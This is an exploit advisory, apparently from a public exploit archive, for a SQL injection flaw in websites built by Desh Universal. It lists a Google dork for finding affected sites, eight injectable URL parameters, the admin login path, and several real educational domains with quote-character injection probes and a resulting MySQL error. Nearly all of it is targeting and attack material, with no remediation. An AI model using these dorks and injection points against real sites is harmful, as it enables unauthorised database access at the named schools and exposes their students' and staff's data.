################################################################################################# # Exploit Title : Developed by Desh Universal (Pvt.) Limited SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/09/2018 # Vendor Homepage : deshuniversal.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Developed by Desh Universal (Pvt.) Limited.'' # Exploits : /teacher?page=[SQL Injection] /teacher?page=[ID-NUMBER]&dept_id=&cat_id=[SQL Injection] /event-details?events-id=[SQL Injection] /notice-details?nid=[SQL Injection] /messages?messageid=[SQL Injection] /text-file?file_id=[SQL Injection] /details?id=[SQL Injection] /program-subjects?programID=[SQL Injection] # Admin Control Panel Path => /login It redirects to another links for login with username and pass. ################################################################################################# # Example Site => rcpsc.edu.bd/teacher?page=4&dept_id=&cat_id=1%27 => [ Proof of Concept ] => archive.is/LIcq4 acps.edu.bd/messages?mid=101%27 cpscm.edu.bd/details?id=5%27 dcc.edu.bd/notice-details?nid=666%27 # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY dupl_teachers.seniority ASC LIMIT 30,10' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################